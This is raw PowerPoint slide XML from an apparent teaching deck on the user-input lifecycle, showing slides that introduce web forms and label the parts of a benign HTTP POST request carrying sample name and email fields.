                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70600195-76AC-45A2-847C-FD4F2DD74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 y="0"/>
            <a:ext cx="9363075" cy="5268290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305326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6869289" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The User-Input Lifecycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883819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F8324C-3288-4A82-AECE-5E9D8696822F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625" y="5334000"/>
            <a:ext cx="9048750" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8B041"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THIS IS A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3598DB"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WEB FORM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(You might’ve seen one before.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B57450AF-5617-4043-9223-49E1A0A8E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 y="0"/>
            <a:ext cx="9363075" cy="4946825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8016D46-49F8-4B2F-B286-26435F523C99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="5181600"/>
            <a:ext cx="365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993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5160F-278D-4C52-B08B-0DBFBD078C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="-76200"/>
            <a:ext cx="9296400" cy="6477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373A733-1F34-437D-8D46-BFA2987C41FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="268069"/>
            <a:ext cx="6372129" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Request with POST Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{091F7199-BD93-42AE-ACCE-ED691D8D1B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-381000" y="1527037"/>
            <a:ext cx="9525000" cy="4173258"/>
            <a:chOff x="-381000" y="1263984"/>
            <a:chExt cx="9525000" cy="4173258"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC808FF9-7529-4FD3-9E22-2C98B1ED386D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-381000" y="1282258"/>
              <a:ext cx="6858000" cy="4154984"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="6350">
              <a:noFill/>
              <a:prstDash val="dash"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>getUserInfo.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Host: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:hlinkClick r:id="rId3">
                    <a:extLst>
                      <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                        <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                      </a:ext>
                    </a:extLst>
                  </a:hlinkClick>
                </a:rPr>
                <a:t>www.api.example.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>User-Agent: Mozilla/4.0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Accept: */*</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Content-Length: 23</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Content-Type: application/x-www-form-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>urlencoded</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="90000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>name=Jane+Doe&amp;email=jane@doe.com</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="1"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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732A7D-EE59-4C3E-86B5-573F1E14E03F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781800" y="2556347"/>
              <a:ext cx="2080204" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="90000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="90000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>HEADERS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Right Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC30F05-B047-4895-B71F-D62B0B7EBB8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6512887" y="1752601"/>
              <a:ext cx="421314" cy="2030150"/>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9108008-6E56-4E61-9A6E-467F12DD9B79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6408956" y="1263984"/>
              <a:ext cx="2735044" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="90000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>REQUEST LINE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3917EF-B022-4E71-B569-31425085E190}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6410452" y="3902171"/>
              <a:ext cx="2471872" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="90000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WHITESPACE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541B68B9-42BC-48FE-AF20-9289EB388784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="914400"/>
            <a:ext cx="73152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80D11F-AD45-49CD-B9B2-2136E97F9FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4869298"/>
            <a:ext cx="2971800" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>REQUEST BODY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1831688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1BB4B34-024A-40C3-A3A7-4EFC423B032D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="284688" y="1974796"/>
            <a:ext cx="8574625" cy="3435404"/>
            <a:chOff x="419100" y="1547555"/>
            <a:chExt cx="8574625" cy="3435404"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="Group 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C4ABF3-BB6C-4208-B8BA-DD23AE185D4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="419100" y="2147092"/>
              <a:ext cx="8130302" cy="2563816"/>
              <a:chOff x="419100" y="1935695"/>
              <a:chExt cx="8130302" cy="2563816"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="7" name="Group 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{565FDD22-82B4-463E-9F5C-81F3D06D3963}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="419100" y="2209260"/>
                <a:ext cx="6038467" cy="2290251"/>
                <a:chOff x="609600" y="2362200"/>
                <a:chExt cx="6545348" cy="2424468"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="2" name="Picture 1">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9512012C-0438-45EC-8AD6-D33AAFFC6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252" y="2363972"/>
                  <a:ext cx="2422696" cy="2422696"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Picture 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A87F033-6282-4C97-A211-73E112C32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362200"/>
                  <a:ext cx="2133600" cy="2133600"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="4" name="Arrow: Right 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A566BB-3133-48EA-A76C-F30E5CE385F4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2739656" y="3183664"/>
                  <a:ext cx="1984744" cy="490671"/>
                </a:xfrm>
                <a:prstGeom prst="rightArrow">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="D14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Arrow: Right 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2068AEF4-A2C7-4B5C-8623-E5E96DD48A20}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6260175" y="2355892"/>
                <a:ext cx="1066800" cy="463508"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrow">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="418B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D41DD4CC-CFF7-4467-960A-01F55D5AEE32}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6260175" y="3498892"/>
                <a:ext cx="1066800" cy="463508"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrow">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="418B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1B378706-24A8-482D-B8B9-4CB3080F5A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222" y="1935695"/>
                <a:ext cx="1098180" cy="1098180"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="Picture 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386806D-1A64-4FD1-AA73-09692BBA9C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1222" y="3200400"/>
                <a:ext cx="1098180" cy="1098180"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="TextBox 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E9913C-CDA6-44B3-A1D5-C9FC4B110C16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2286000" y="2895600"/>
              <a:ext cx="1827744" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="D14828"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>REQUEST</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="TextBox 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79FAB811-C864-41B5-8CF7-7AB060111D12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4545667" y="4521294"/>
              <a:ext cx="1564403" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7CA5C6"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>SERVER</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="TextBox 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A199853-712F-4415-A064-2CB529645DCE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006899" y="1547555"/>
              <a:ext cx="1986826" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
